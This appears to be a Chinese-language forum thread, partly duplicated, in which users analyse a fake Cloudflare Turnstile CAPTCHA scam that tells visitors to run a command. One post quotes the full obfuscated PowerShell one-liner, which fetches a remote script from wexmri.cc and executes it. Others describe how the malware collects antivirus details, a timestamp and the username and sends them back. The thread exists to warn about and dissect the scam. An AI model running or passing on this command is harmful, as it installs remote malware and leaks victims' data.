@libecho #152 确实是我错了, 我调用了自带版本 but这个脚本只支持powershell 5 hhh win7意外的免疫了,代码好像都不支持powershell 3.0 - 病毒脚本下载链接为wexmri.cc(UA需要有WindowsPowerShell字段,否则返回404 Not Found字符串), 网址浏览器早就报毒了 原逻辑代码为irm <url> | iex直接执行, iex字段是从远程脚本里面来的 从html到powershell全是混淆的 , 手拆好麻烦... AI又不帮我解混淆... 气抖冷 用了大量混淆,ASCII代替关键字符串反杀软 标准的杀软+时间戳+用户名收集回传 不折腾了,开摆. 剩下的都是远程下发操作了.
This is already known for some time, but first time seeing it with cloudflare turnstile. 这已为人所知许久,但这是我第一次在Cloudflare Turnstile中见到它。 https://www.youtube.com/watch?v=lSa_wHW1pgQ
@linying23333 #147 发布于2026/1/29 下午4:33:08,编辑于2026/1/29 下午4:41:19 不知道是什么原理,就是要cmd运行一段代码。 powershell.exe -Wi MINI $JD='dUBLxgwGegPWexMRI.ccepIpZQ';$fQ=.($JD[((-68)+(97))]+$JD[22]+$JD[11]) ($JD.Substring(((99)-(81)),(18)/(2))) -uSEBa; .($fQ.Substring(1,3))($fQ); 就这样的代码,然后,就可以验证通过了。 本来还想虚拟机拿个样本看一眼, 没想到跑不起来 ~~我开bincheck.io/zh是看不到OP的假验证码界面的, 估计OP是被DNS劫持掉了 ~~ 哦~出现了, 每次还不一样还hhh 高手们,多多研究一下,干死这个木马骗局!
有AI都不是什么难事了
@linying23333 #150 不好意思,我看 Win7 还以为是自带的版本
@libecho #152 确实是我错了, 我调用了自带版本
but这个脚本只支持
powershell 5hhh win7意外的免疫了,代码好像都不支持
powershell 3.0 -病毒脚本下载链接为
wexmri.cc(UA需要有WindowsPowerShell字段,否则返回404 Not Found字符串), 网址浏览器早就报毒了原逻辑代码为
, 手拆好麻烦... AI又不帮我解混淆... 气抖冷 
irm <url> | iex直接执行,iex字段是从远程脚本里面来的从html到powershell全是混淆的
用了大量混淆,ASCII代替关键字符串反杀软
标准的杀软+时间戳+用户名收集回传
不折腾了,开摆. 剩下的都是远程下发操作了.
This is already known for some time, but first time seeing it with cloudflare turnstile.
这已为人所知许久,但这是我第一次在Cloudflare Turnstile中见到它。
https://www.youtube.com/watch?v=lSa_wHW1pgQ
高手们,多多研究一下,干死这个木马骗局!
@fdiskmbr #155 菜逼一个而已
@oloker #154 tks确实可以从该视频学习一下
原谅我吧
不厚道的笑
年末好多骗子
合影留念,评为论坛第一乐子不为过吧!